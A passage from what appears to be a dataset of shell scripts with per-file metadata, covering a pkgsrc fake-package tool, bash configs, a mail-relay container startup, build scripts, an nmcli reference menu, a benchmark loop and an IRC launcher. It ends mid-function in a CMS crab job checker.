	`bmake show-var VARNAME=_GENERATE_PLIST | sed -e 's,; true;,,'` | eval awk `bmake show-var VARNAME=_PLIST_AWK_SCRIPT`
}
# main #
# Dispatch on the first argument. -l/-L/-H need no package name; every
# other option requires a (possibly abbreviated) package name in $2.
if [ -z "${1}" ]; then
show_help
exit 1
fi
case "${1}" in
"-l"|"-L"|"-H")
;;
*)
if [ -z "${2}" ]; then
show_help
echo ""
echo "!! Target package name is mandatory. !!"
exit 1
fi
;;
esac
# NOTE(review): dead code — $1 was already checked above, and 'break' is a
# no-op outside a loop (an error in some shells).
if [ -z "$1" ]; then break; fi
case $1 in
"-l") # list all fake packages installed
list_all
exit 0
;;
"-L") # list all fake alternatives
list_all_alternatives
exit 0
;;
"-a") # adds files to a fake package
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then
echo "Target package required"
exit 1
fi
if [ -e "${PKGDB}/${PKG}/+FAKE" ]; then
# A fresh fake package has exactly one line in +CONTENTS header? No: two
# lines; a 1-line file means it was never initialized. TODO confirm.
if [ ! "1" = "`cat ${PKGDB}/${PKG}/+CONTENTS | wc -l`" ]; then
echo "Target package already have PLIST."
echo "Press ^C to cancel the append."
fi
# Append PLIST entries read from stdin until EOF.
echo "^D or EOF finishes."
cat >> ${PKGDB}/${PKG}/+CONTENTS
echo "done"
else
echo "This is not a fake package."
fi
;;
"-c") # clears the PLIST file
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then
echo "Target package required"
exit 1
fi
clear_contents ${PKG}
echo "done"
;;
"-p") # shows the PLIST of a installed or not package.
PKG=$2
# A name containing '/' is a pkgsrc category/name path, not an installed pkg.
if [ -n "`echo ${PKG}| grep /`" ]; then
if [ ! -d "${PKGSRC}/${PKG}" ]; then
echo "This package does not exists."
exit 1
fi
print_plist ${PKGSRC}/${PKG}
else
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then
echo "Package not installed. looking in the pkgsrc tree." > /dev/stderr
PKG=`pkgfind -qxn1 "${2}"`
if [ -z "${PKG}" ]; then
echo "No target package found." >/dev/stderr
exit 1
fi
print_plist ${PKGSRC}/${PKG}
else
cat ${PKGDB}/${PKG}/+CONTENTS
fi
fi
;;
"-i") # install new fake package
PKG="${2}"
if [ -z "${PKG}" ]; then
echo "Target package required"
exit 1
fi
if [ -d "${PKGDB}/${PKG}" ]; then
echo "package ${PKG} yet exists."
exit 1
fi
printf "COMMENT="
read COMMENT
COMMENT="FAKE ${COMMENT}"
# create package
mkdir -p "${PKGDB}/${PKG}"
:> "${PKGDB}/${PKG}/+FAKE"
clear_contents ${PKG}
#echo "@name ${PKG}" > "${PKGDB}/${PKG}/+CONTENTS"
#echo "@cwd ${PREFIX}" > "${PKGDB}/${PKG}/+CONTENTS"
# NOTE(review): the second '>' overwrites the first +BUILD_INFO line
# (OBJECT_FMT is lost); '>>' was probably intended.
echo "OBJECT_FMT=ELF" > "${PKGDB}/${PKG}/+BUILD_INFO"
echo "OPSYS=`uname -s`" > "${PKGDB}/${PKG}/+BUILD_INFO"
:> "${PKGDB}/${PKG}/+DESC"
:> "${PKGDB}/${PKG}/+SIZE_ALL"
:> "${PKGDB}/${PKG}/+SIZE_PKG"
echo "${COMMENT}" > "${PKGDB}/${PKG}/+COMMENT"
echo "[i] package created."
exit 0
;;
"-A") # creates a new fake alternative
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ -e "${PKGDB}/${PKG}/+ALTERNATIVES" ]; then
if [ -e "${PKGDB}/${PKG}/+FAKE_ALT" ]; then
edit_alternatives ${PKG}
else
echo "This is not a valid fake alternatives package (already have a valid ALTERNATIVES)."
fi
else
:> "${PKGDB}/${PKG}/+FAKE_ALT"
edit_alternatives ${PKG}
fi
exit 0
;;
"-r") # removes a fake package
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ -e "${PKGDB}/${PKG}/+FAKE" ]; then
# NOTE(review): '2>&1 >/dev/null' leaks stderr to the old stdout; and the
# "pacakge" typo below is a runtime string, left untouched here.
rm -rf "${PKGDB}/${PKG}" 2>&1 >/dev/null
if [ "$?" = "0" ]; then
echo "package removed."
exit 0
else
echo "cannot remove pacakge. check permissions."
exit 1
fi
else
echo "target package isn't fake. not removed."
exit 1
fi
;;
"-R") # removes a fake alternatives
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ ! -d "${PKGDB}/${PKG}" ]; then
echo "This package does not exists."
exit 1
fi
if [ -e "${PKGDB}/${PKG}/+FAKE_ALT" ]; then
pkg_alternatives -gs unregister "${PKGDB}/${PKG}/+ALTERNATIVES"
rm -f "${PKGDB}/${PKG}/+ALTERNATIVES" &&
rm -f "${PKGDB}/${PKG}/+FAKE_ALT" &&\
echo "Fake alternatives removed from ${PKG}"
else
echo "this is not a fake alternative package"
fi
exit 0;
;;
# Hidding
"-h"|"--hide") # hides the desired package.
init_hide
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ -e "${PKGDB}/${PKG}" ]; then
mv ${PKGDB}/${PKG} ${PKGHIDE}/${PKG}
exit 0
else
echo "Target package is not installed in your system."
exit 1
fi
# NOTE(review): unreachable — both branches above exit first.
fini_hide
;;
"-u"|"--unhide") # unhides the target package.
init_hide
PKG=`package_autocompletion "${2}" "${PKGHIDE}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ -e ${PKGHIDE}/${PKG} ]; then
mv ${PKGHIDE}/${PKG} ${PKGDB}/${PKG}
exit 0
else
echo "Target package is not installed in your system."
exit 1
fi
# NOTE(review): unreachable — both branches above exit first.
fini_hide
;;
"-H") # list all hidding packages.
if [ -d "${PKGHIDE}" ]; then
ls ${PKGHIDE}
fi
;;
*) # shows help message
show_help
exit 0
;;
esac
exit 1
| true
|
775dafa8bbb22180e54a05ee4e286cb665420d68
|
Shell
|
phisphere/dotfiles
|
/.bashrc
|
UTF-8
| 1,442
| 2.953125
| 3
|
[] |
no_license
|
[ -z "$PS1" ] && return
PS1='\[\e[0;32m\]\u\[\e[m\] \[\e[1;34m\]\w\[\e[m\] \[\e[m\] \[\e[1;32m\]\$ \[\e[m\]\[\e[0;37m\] '
# alias
alias ls='ls --color=auto'
eval `dircolors -b`
alias c='clear'
alias e='exit'
alias x='startx'
alias h='halt'
alias r='reboot'
alias zen='pmount /dev/sdb1'
alias zenu='pumount /dev/sdb1'
alias am='alsamixer'
alias ht='htop'
alias rt='rtorrent'
alias moc='mocp -T default'
alias mp='mplayer'
alias wc='weechat-curses'
alias mi='mitter -i cmd'
alias mkp='makepkg -c'
alias ex='extract'
alias et='amixer sset Master,0 96 & sh /usr/local/games/enemy-territory/et'
alias ut='amixer sset Master,0 96 & /home/verner/downloads/games/urbanterror/ioUrbanTerror.i386'
# extract <archive> — unpack an archive into the current directory, choosing
# the tool by file extension. Unknown extensions and missing files produce a
# message on stdout (as in the original).
# Fix: every use of $1 is quoted, so archive paths containing spaces or glob
# characters no longer word-split or expand.
extract () {
  if [ -f "$1" ]; then
    case "$1" in
      *.tar.bz2) tar xjf "$1" ;;
      *.tar.gz) tar xzf "$1" ;;
      *.bz2) bunzip2 "$1" ;;
      *.rar) unrar e "$1" ;;
      *.gz) gunzip "$1" ;;
      *.tar) tar xf "$1" ;;
      *.tbz2) tar xjf "$1" ;;
      *.tgz) tar xzf "$1" ;;
      *.zip) unzip "$1" ;;
      *.Z) uncompress "$1" ;;
      *.7z) 7z x "$1" ;;
      *) echo "'$1' cannot be extracted via extract()" ;;
    esac
  else
    echo "'$1' is not a valid file"
  fi
}
# bash completion
if [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
# other
# Force OpenOffice.org to use the GNOME desktop integration.
export OOO_FORCE_DESKTOP=gnome
| true
|
18bdc5499747840797e4e48dc6cb917952afd131
|
Shell
|
jaburns/quickmail
|
/startup
|
UTF-8
| 408
| 2.734375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Container entrypoint for quickmail: writes an ssmtp configuration from
# environment variables, serves /root/server over TCP port 80 via socat,
# and tails the server's log pipe to stay in the foreground.
# Required env: EMAIL, PASSWORD. Optional: MAILHUB (host:port; defaults to
# Gmail's submission endpoint below).
[[ -z "$MAILHUB" ]] && MAILHUB='smtp.gmail.com:587'
# NOTE(review): the SMTP password is written in plain text to ssmtp.conf.
cat >/etc/ssmtp/ssmtp.conf <<EOF
root=$EMAIL
mailhub=$MAILHUB
AuthUser=$EMAIL
AuthPass=$PASSWORD
UseTLS=YES
UseSTARTTLS=YES
hostname=localhost
FromLineOverride=YES
EOF
# Route mail addressed from root through the configured account.
echo "root:$EMAIL:$MAILHUB" >/etc/ssmtp/revaliases
mkfifo /root/logpipe
# One /root/server process per incoming connection.
socat TCP4-LISTEN:80,fork EXEC:/root/server &
echo 'Server started'
# Stream the server's log output forever (keeps PID 1 alive).
tail -f /root/logpipe
| true
|
2321921883aeff0be45d21b571a60155e6a9b178
|
Shell
|
ch-mach/CopierToPykota
|
/config.sh
|
UTF-8
| 1,009
| 2.578125
| 3
|
[] |
no_license
|
echo "Vergeben Sie eine ID für den Drucker:"
read ID
echo "Drucker aktiv (0/1)?"
read IS_ACTIVE
echo "IS_ACTIVE=$IS_ACTIVE" >> ./cfg/$ID.cfg
# usw
#IS_ACTIVE=1
#TYP=Canon7055
#IS_COLOUR=1
#IP=10.16.102.211:8000
#ADMIN_USER=7654321
#ADMIN_PWD=7654321
#DIR_NEWUSER=
#PARAM_NEWUSER=
#DIR_LIMIT=
#PARAM_LIMIT=
#DIR_DEL_USER=
#PARAM_DEL_USER=
#CMD_ADDUSER=curl -s -b <TMPDIR>/cookie_<ID>.txt -d "SecID=<NO>&Pswd=0&Pswd_Chk=1&TotalCheck=1&Flag=Exec_Data" "<ADMIN_USER>:<ADMIN_PWD>@<IP>/rps/csp.cgi"
#CMD_COOKIE=curl -c <TMPDIR>/cookie_<ID>.txt "<IP>/login" -d "uri=/&deptid=<ADMIN_USER>&password=<ADMIN_PWD>" && curl -s -b <TMPDIR>/cookie_<ID>.txt -c <TMPDIR>/cookie_<ID>.txt "<ADMIN_USER>:<ADMIN_PWD>@<IP>/rps/nativetop.cgi?RUIPNxBundle=&CorePGTAG=PGTAG_CONF_ENV_PAP" > /dev/null
# Die Werte geben die Position der entsprechenden Werte in der Auswertedatei des jeweiligen
# Kopierers an. Dabei ist folgende Reihenfolge zu beachten:
# KopienSW;DruckSW;LimitSW;KopienCl;DruckCl;LimitCl
#FELDER=1;0;2;0;0;0
| true
|
5e06a51adc9536da90a92379cae49f432d2eb2d6
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/nicotine-plus-git/PKGBUILD
|
UTF-8
| 874
| 2.578125
| 3
|
[] |
no_license
|
#! /bin/bash
# Maintainer: Rafael Cavalcanti <rc.cavalcanti at gmail dot com>
# Contributor: Jorge Barroso <jorge.barroso.11 at gmail dot com>
# Contributor: x-demon
# Arch Linux PKGBUILD for the git snapshot of Nicotine+ (Soulseek client).
pkgname=nicotine-plus-git
_gitname=nicotine-plus
pkgver=r2105.e91f0e9
pkgrel=3
pkgdesc="A fork of Nicotine, a graphical client for Soulseek."
arch=('i686' 'x86_64')
url="http://nicotine-plus.org"
license=('GPL')
depends=('pygtk' 'gtk2' 'mutagen')
makedepends=('git' 'python2')
optdepends=('miniupnpc: To enable UPnP support'
'python2-geoip: To enable geo-blocker'
'python2-notify: Notification support')
source=(git+https://github.com/Nicotine-Plus/${_gitname}.git)
sha512sums=('SKIP')
# Version derived from git history: r<commit count>.<short hash>
pkgver() {
cd "${srcdir}/$_gitname"
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
}
# NOTE(review): build() installs into $srcdir/pkg and package() mv's it into
# $pkgdir; the conventional form is to run setup.py install with
# --root="$pkgdir" inside package(). Left as-is.
build() {
cd "$srcdir/$_gitname"
python2 setup.py install --root=$srcdir/pkg
}
package() {
mv ${srcdir}/pkg/* ${pkgdir}
}
| true
|
7136057cc4a471365c8e417679581b9dd3ee5cef
|
Shell
|
artcom/mobile-spark
|
/projects/DemoApp/android/build.sh
|
UTF-8
| 530
| 3.1875
| 3
|
[
"MIT",
"BSL-1.0"
] |
permissive
|
#! /bin/bash
# Android build wrapper for the DemoApp spark component: normalizes the
# build environment (ARM_TARGET, ANDROID_LEVEL), then delegates to the
# shared android/build_project.sh inside $MOBILE_SPARK.
SPARK_COMPONENT_DIR=`pwd`/..
# Under Cygwin, $MOBILE_SPARK may be a Windows-style path; convert it first.
if [[ "`uname -s`" == *CYGWIN* ]]; then
cd $(cygpath "$MOBILE_SPARK/")
else
cd $MOBILE_SPARK
fi
# ${VAR:+1} expands non-empty only when VAR is set and non-empty.
if [ -z "${ARM_TARGET:+1}" ]; then
export ARM_TARGET="armeabi-v7a"
echo "Using default ARM_TARGET $ARM_TARGET"
fi
if [ -z "${ANDROID_LEVEL:+1}" ]; then
export ANDROID_LEVEL="9"
echo "Using default ANDROID_LEVEL $ANDROID_LEVEL"
fi
# Forward all CLI arguments. NOTE(review): unquoted $* re-splits arguments
# containing spaces; "$@" would preserve them — confirm callers before changing.
SPARK_COMPONENT_NAME="DemoApp" SPARK_COMPONENT_DIR=$SPARK_COMPONENT_DIR android/build_project.sh $*
cd $SPARK_COMPONENT_DIR/android
| true
|
dcebadf683e938a5c2d45b32315d708194db440d
|
Shell
|
Grannik/menuNmcli
|
/menuNmcli.sh
|
UTF-8
| 11,375
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
# Interactive full-screen cheat sheet for nmcli (the NetworkManager CLI),
# drawn with raw ANSI escape sequences and tput. Navigate with the Up/Down
# arrow keys, select with Enter; most entries print the relevant nmcli
# command, a few run a program directly (man, nmtui).
E='echo -e'; # -e enables interpretation of escape sequences
e='echo -en'; # -n suppresses the trailing newline
trap "R;exit" 2 # on SIGINT (Ctrl-C) restore the terminal and exit
ESC=$( $e "\e")
# Move the cursor to row $1, column $2.
TPUT(){ $e "\e[${1};${2}H" ;}
# Full terminal reset.
CLEAR(){ $e "\ec";}
# 25 is presumably the cursor-visibility attribute (this hides the cursor)
CIVIS(){ $e "\e[?25l";}
# this is the colour of the list text before the cursor when UNMARK(){ $e "\e[0m";} holds 0
MARK(){ $e "\e[44m";}
# 0 is the colour of the list
UNMARK(){ $e "\e[0m";}
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ These lines set the background colour ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
R(){ CLEAR ;stty sane;CLEAR;}; # in this variant the background stays transparent
# R(){ CLEAR ;stty sane;$e "\ec\e[37;44m\e[J";}; # in this variant the whole terminal background is painted
# R(){ CLEAR ;stty sane;$e "\ec\e[0;45m\e[";}; # in this variant only the menu background is painted
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Draw the static frame, headings and section titles.
HEAD(){ for (( a=1; a<=39; a++ ))
do
TPUT $a 1
$E "\xE2\x94\x82 \xE2\x94\x82";
done
TPUT 3 2
$E "$(tput bold) Справочник WIFI утилиты nmcli$(tput sgr 0)";
TPUT 4 2
$E "$(tput setaf 2) network manager command-line interface $(tput sgr 0)";
TPUT 14 2
$E "$(tput setaf 2) Показать show $(tput sgr 0)";
TPUT 21 2
$E "$(tput setaf 2) Состояние status $(tput sgr 0)";
TPUT 25 2
$E "$(tput setaf 2) Cписок list $(tput sgr 0)";
TPUT 27 2
$E "$(tput setaf 2) Cвязь connection $(tput sgr 0)";
TPUT 33 2
$E "$(tput setaf 2) Псевдографический интерфейс $(tput sgr 0)";
TPUT 36 2
$E "$(tput setaf 2) Up \xE2\x86\x91 \xE2\x86\x93 Down Select Enter $(tput sgr 0)";
MARK;TPUT 1 2
$E " Программа написана на bash tput " ;UNMARK;}
i=0; CLEAR; CIVIS;NULL=/dev/null
# 32 is the distance from the top and 48 the distance from the left
FOOT(){ MARK;TPUT 39 2
$E " Grannik | 2021.07.05 ";UNMARK;}
# this drives the up/down keys
i=0; CLEAR; CIVIS;NULL=/dev/null
#
# Read one keypress and translate it to "up", "dn" or "enter".
ARROW(){ IFS= read -s -n1 key 2>/dev/null >&2
if [[ $key = $ESC ]];then
read -s -n1 key 2>/dev/null >&2;
if [[ $key = \[ ]]; then
read -s -n1 key 2>/dev/null >&2;
if [[ $key = A ]]; then echo up;fi
if [[ $key = B ]];then echo dn;fi
fi
fi
if [[ "$key" == "$($e \\x0A)" ]];then echo enter;fi;}
# 4 onward is the offset from the top and 48 the distance from the left
M0(){ TPUT 6 3; $e " Главный сайт ";}
M1(){ TPUT 7 3; $e " Pуководство ";}
M2(){ TPUT 8 3; $e " Запустить службу NetworkManager ";}
M3(){ TPUT 9 3; $e " Перезапустить службу NetworkManager ";}
M4(){ TPUT 10 3; $e " Показать состояние ";}
M5(){ TPUT 11 3; $e " Включить / выключить ";}
M6(){ TPUT 12 3; $e " Посмотреть имя хоста ";}
M7(){ TPUT 13 3; $e " Убедиться, что NetworkManager запущен ";}
M8(){ TPUT 15 3; $e " Показать информацию об устройствах ";}
M9(){ TPUT 16 3; $e " Показать информацию об устройстве ";}
M10(){ TPUT 17 3; $e " Показать информацию о сетевых интерфейсах ";}
M11(){ TPUT 18 3; $e " Показать таблицу маршрутизации ";}
M12(){ TPUT 19 3; $e " Показать список доступных подключений ";}
M13(){ TPUT 20 3; $e " Показать одно подключение ";}
M14(){ TPUT 22 3; $e " Увидеть статус всех сетевых интерфейсов ";}
M15(){ TPUT 23 3; $e " Cмотрим статус состояние интерфейсов ";}
M16(){ TPUT 24 3; $e " Проверяем статус NetworkManager ";}
M17(){ TPUT 26 3; $e " Просканировать ближайшие сети Wi-Fi ";}
M18(){ TPUT 28 3; $e " Узнать название интерфейса ";}
M19(){ TPUT 29 3; $e " Установить соединение с SSID ";}
M20(){ TPUT 30 3; $e " Переключение на другую SSID ";}
M21(){ TPUT 31 3; $e " Oбновить настройки ";}
M22(){ TPUT 32 3; $e " Поднять / отключить интерфейс ";}
M23(){ TPUT 34 3; $e " Псевдографический интерфейс на Whiptail ";}
M24(){ TPUT 35 3; $e " Показать команду терминала ";}
M25(){ TPUT 37 3; $e " EXIT ";}
# LM is the index of the last menu entry; it lets the cursor wrap around.
LM=25
# Draw every menu entry M0..M$LM.
MENU(){ for each in $(seq 0 $LM);do M${each};done;}
# Update the selection index i from the last keypress, wrapping at the ends.
POS(){ if [[ $cur == up ]];then ((i--));fi
if [[ $cur == dn ]];then ((i++));fi
if [[ $i -lt 0 ]];then i=$LM;fi
if [[ $i -gt $LM ]];then i=0;fi;}
# Redraw only the entries adjacent to the cursor to avoid flicker.
REFRESH(){ after=$((i+1)); before=$((i-1))
if [[ $before -lt 0 ]];then before=$LM;fi
if [[ $after -gt $LM ]];then after=0;fi
if [[ $j -lt $i ]];then UNMARK;M$before;else UNMARK;M$after;fi
if [[ $after -eq 0 ]] || [ $before -eq $LM ];then
UNMARK; M$before; M$after;fi;j=$i;UNMARK;M$before;M$after;}
INIT(){ R;HEAD;FOOT;MENU;}
# Highlight the current entry ($S) and wait for the next keypress.
SC(){ REFRESH;MARK;$S;$b;cur=`ARROW`;}
# Helper: wait for ENTER, then redraw the main menu
ES(){ MARK;$e " ENTER = main menu ";$b;read;INIT;};INIT
while [[ "$O" != " " ]]; do case $i in
# Keep these in sync: the case label (e.g. 0) and S=M0 must both match the menu entry M0().
0) S=M0 ;SC;if [[ $cur == enter ]];then R;echo " https://developer.gnome.org/NetworkManager/stable/nmcli.html";ES;fi;;
1) S=M1 ;SC;if [[ $cur == enter ]];then R;man nmcli;ES;fi;;
2) S=M2 ;SC;if [[ $cur == enter ]];then R;echo "
sudo systemctl start NetworkManager
";ES;fi;;
3) S=M3 ;SC;if [[ $cur == enter ]];then R;echo " systemctl restart NetworkManager";ES;fi;;
4) S=M4 ;SC;if [[ $cur == enter ]];then R;echo "
Показать включен или выключен:
nmcli radio wifi
Ответ:
----------+----------
$(tput setaf 2) enabled $(tput sgr 0) | включено
$(tput setaf 1) disabled $(tput sgr 0) | выключено
";ES;fi;;
5) S=M5 ;SC;if [[ $cur == enter ]];then R;echo "
Включить:
nmcli radio wifi on
Выключить:
nmcli radio wifi off
";ES;fi;;
6) S=M6 ;SC;if [[ $cur == enter ]];then R;echo " nmcli general hostname";ES;fi;;
7) S=M7 ;SC;if [[ $cur == enter ]];then R;echo " nmcli general";ES;fi;;
8) S=M8 ;SC;if [[ $cur == enter ]];then R;echo "
nmcli device show
nmcli dev show
";ES;fi;;
9) S=M9 ;SC;if [[ $cur == enter ]];then R;echo " nmcli device show имя_устройства";ES;fi;;
10) S=M10;SC;if [[ $cur == enter ]];then R;echo " ip addr show";ES;fi;;
11) S=M11;SC;if [[ $cur == enter ]];then R;echo " ip route show match 0/0";ES;fi;;
12) S=M12;SC;if [[ $cur == enter ]];then R;echo "
Команда:
nmcli connection show
или
nmcli con show
или
nmcli c s
Посмотреть только активные соединения:
nmcli con show -a
";ES;fi;;
13) S=M13;SC;if [[ $cur == enter ]];then R;echo " nmcli connection show \"имя_соединения\"";ES;fi;;
14) S=M14;SC;if [[ $cur == enter ]];then R;echo "
Команда:
nmcli device status
или
nmcli dev status
Ответ:
-----------+------+-----------+-----------
DEVICE | TYPE | STATE | CONNECTION
$(tput setaf 2) устройство | тип | состояние | связь $(tput sgr 0)
$(tput setaf 2) connected $(tput sgr 0) | подключено
$(tput setaf 1) disconnected $(tput sgr 0) | не подключено
$(tput setaf 7) unavailable $(tput sgr 0) | недоступен
$(tput setaf 7) unmanaged $(tput sgr 0) | неуправляемый
";ES;fi;;
15) S=M15;SC;if [[ $cur == enter ]];then R;echo " nmcli general status ";ES;fi;;
16) S=M16;SC;if [[ $cur == enter ]];then R;echo " systemctl status NetworkManager ";ES;fi;;
17) S=M17;SC;if [[ $cur == enter ]];then R;echo "
Команда:
nmcli device wifi list
или
nmcli dev wifi list
";ES;fi;;
18) S=M18;SC;if [[ $cur == enter ]];then R;echo "
Команда:
nmcli connection
или
nmcli con
";ES;fi;;
19) S=M19 ;SC;if [[ $cur == enter ]];then R;echo "
Команда:
sudo nmcli dev wifi connect имя_сети
Команда с паролем:
sudo nmcli dev wifi connect имя_сети password \"пароль\"
В качестве альтернативы можно использовать параметр –ask
sudo nmcli --ask dev wifi connect имя_сети
Теперь система попросит вас ввести сетевой пароль, не делая его видимым.
";ES;fi;;
20) S=M20 ;SC;if [[ $cur == enter ]];then R;echo "
При подключении к одной сети, но надо использовать другое соединение,
Можно отключиться, переключив соединение на «Нет» .
Нужно будет указать SSID или, если несколько подключений с одним и тем же SSID, используйте UUID.
nmcli con down ssid/uuid
Чтобы подключиться к другому сохраненному соединению, просто передать опцию up в команде nmcli.
Убедитесь, что вы указали SSID или UUID новой сети, к которой хотите подключиться.
nmcli con up ssid/uuid
";ES;fi;;
21) S=M21;SC;if [[ $cur == enter ]];then R;echo " nmcli connection up static";ES;fi;;
22) S=M22;SC;if [[ $cur == enter ]];then R;echo "
Поднять интерфейс:
nmcli con up имя_интерфейса
Oтключить интерфейс:
nmcli con down имя_интерфейса
";ES;fi;;
23) S=M23;SC;if [[ $cur == enter ]];then R;nmtui;ES;fi;;
24) S=M24;SC;if [[ $cur == enter ]];then R;echo " nmtui ";ES;fi;;
25) S=M25;SC;if [[ $cur == enter ]];then R;exit 0;fi;;
esac;POS;done
| true
|
b22292a145951312b92584da84ba30c131604f9b
|
Shell
|
a-a-code/repo
|
/.bashrc
|
UTF-8
| 332
| 2.890625
| 3
|
[] |
no_license
|
# Interactive Check
# Abort immediately for non-interactive shells (scp, rsync, scripts) so
# the aliases and prompt setup below do not run for them.
[[ $- != *i* ]] && return
# Aliases
alias .='cd ..'
alias ..='cd ../..'
alias grep='grep --color=auto'
alias ls='ls -ahl --color=auto'
# Prompt: red HH:MM clock followed by a red ">".
export PS1="\[\e[31m\]\A\[\e[m\]\[\e[31m\]>\[\e[m\] "
# History: disable command-history recording for this session.
set +o history
# Exports
export EDITOR=nvim
# LS after CD
# Wrap the builtin so every successful directory change lists its contents.
function cd {
	builtin cd "$@" && ls -F
}
| true
|
87c1f436a02600796fcb55d4d2a5a687a79b72d1
|
Shell
|
mzp/chef-repo
|
/bin/setup
|
UTF-8
| 105
| 2.734375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# Dotfile linker preview: for every file under ~/home/dotfiles, print the
# rm/ln -s commands that would (re)link it into the current directory.
# NOTE(review): the commands are echoed, not executed — presumably a
# deliberate dry run; drop the "echo"s to actually link.
# NOTE(review): "~/home/dotfiles" is an unusual path — confirm it is not
# meant to be "~/dotfiles".
for i in ~/home/dotfiles/*; do
	echo rm .$(basename $i)
	echo ln -s $i .$(basename $i);
done
| true
|
4c75cd50dc8b429fe0cd697ed346666d48a23ec2
|
Shell
|
cthit/misc
|
/irkk
|
UTF-8
| 2,105
| 4.0625
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# irkk — attach to (or create) a persistent IRC session.
# On first run the user picks a client (WeeChat/Irssi) and a multiplexer
# (screen/tmux); the choice is stored in ~/.irkk-choice and reused after
# that. Run with -f/--force to discard the stored choice (and, optionally,
# any live session).
CHOICE_FILE="$HOME/.irkk-choice"
choice=0
if [ "$1" == "-f" ] || [ "$1" == "--force" ]; then
	echo -e "You've choosen to replace yor irkk choice.\n"
	# Check if user already has screen running.
	# Note that these "booleans" are inverted
	hasScreen=$(screen -ls | grep -c irkk)
	hasTmux=$(tmux list-sessions 2>/dev/null | grep -c irkk)
	goahead="true"
	if [ "$hasScreen" -gt "0" ] || [ "$hasTmux" -gt "0" ]; then
		echo "Please note that you have a session running already."
		echo -e "Do you want to replace it with a new choice?\n(note that your IRC connection will be disconnected)"
		select answer in "Yes please" "Hell no!"; do
			case $answer in
				"Yes please" ) goahead="true"; break ;;
				"Hell no!" ) goahead="false"; break;;
			esac
		done
	fi
	if [ "$goahead" == "true" ]; then
		# Tear down whichever multiplexer currently hosts the session.
		if [ "$hasScreen" -gt "0" ]; then
			screen -S irkk -X quit
		elif [ "$hasTmux" -gt "0" ]; then
			tmux kill-session -t irkk
		fi
		# Forget the stored choice. (Bug fix: the original wrapped this —
		# and the writes/read below — in pointless `eval`s, which were
		# unnecessary and unsafe; plain commands with a quoted path do
		# exactly the intended work.)
		[ ! -f "$CHOICE_FILE" ] || rm "$CHOICE_FILE"
	fi
fi
# No previous choice
if [ ! -f "$CHOICE_FILE" ]; then
	echo -e "(run 'irkk -f' if you were unsatisfied with your choice)\nDo you want to use:"
	weechatScreen="WeeChat in Screen (recommended)"
	irssiScreen="Irssi in Screen"
	weechatTmux="WeeChat in tmux"
	irssiTmux="Irssi in tmux"
	select answer in "$weechatScreen" "$irssiScreen" "$weechatTmux" "$irssiTmux"; do
		# Patterns are quoted so the option text is matched literally.
		case $answer in
			"$weechatScreen" ) echo 1 > "$CHOICE_FILE"; break ;;
			"$irssiScreen" ) echo 2 > "$CHOICE_FILE"; break;;
			"$weechatTmux" ) echo 3 > "$CHOICE_FILE"; break;;
			"$irssiTmux" ) echo 4 > "$CHOICE_FILE"; break;;
		esac
	done
fi
choice=$(cat "$CHOICE_FILE")
# Attach to the existing session, or start a fresh one with the chosen client.
case $choice in
	1 ) screen -xRR irkk -q weechat-curses ;;
	2 ) screen -xRR irkk -q irssi ;;
	3 ) tmux attach-session -t irkk || tmux new-session -s irkk weechat-curses ;;
	4 ) tmux attach-session -t irkk || tmux new-session -s irkk irssi ;;
esac
| true
|
7860edab436f67dcb67631645ae6f46357bca8f9
|
Shell
|
DNJha/CCPE-DockerBenchmarkCode
|
/Code/Case_2/linpack+ycruncher/out1.sh
|
UTF-8
| 405
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Endlessly run the y-cruncher 100m benchmark, appending a timestamped log
# of every iteration to app/yc.txt.
iteration=1
while true
do
	echo "----------------------------------" >> app/yc.txt
	echo "Running YC started at: " >> app/yc.txt
	# Blank line to stdout (kept from the original); timestamp into the log.
	echo
	date >> app/yc.txt
	echo "YC Iteration: " $iteration >> app/yc.txt
	# Run one benchmark pass from inside the y-cruncher directory and
	# capture all of its output into the log.
	echo "$(cd /y-cruncher\ v0.7.5.9481-static && ./y-cruncher bench 100m)" >> app/yc.txt
	echo "Finished YC Iteration " $iteration >> app/yc.txt
	echo
	date >> app/yc.txt
	iteration=$((iteration+1))
done
| true
|
954bbe8e8560a9c82e4bb8d28617248a2f1a1117
|
Shell
|
IMSA-CMS/MCAutomation
|
/manageStepNewAddCopy.sh
|
UTF-8
| 3,611
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
#Go through all the lines in the file, write the step name and date
# Map a crab config file stem to its short production-step name, stored in
# the global $stepName (GENSIM/RECO/AOD/MINIAOD). Unknown stems leave
# $stepName untouched. The "entered..." echoes are debug output preserved
# from the original implementation.
stepShort() {
	echo "entered"$1
	case "$1" in
		genSimCrabConfig)
			echo "entered2"
			stepName="GENSIM"
			;;
		recoCrabConfig)
			stepName="RECO"
			;;
		aodCrabConfig)
			stepName="AOD"
			;;
		miniAODSIM_crabConfig)
			stepName="MINIAOD"
			;;
	esac
}
jobCheck(){
	# Classify the crab job in directory $1 from its `crab status` output.
	# Reports the class both on stdout and in the global $jobChecker:
	#   0 - publication finished (100%),  1 - failed / needs resubmission,
	#   2 - still running or idle,        3 - called without an argument.
	#crab status $1
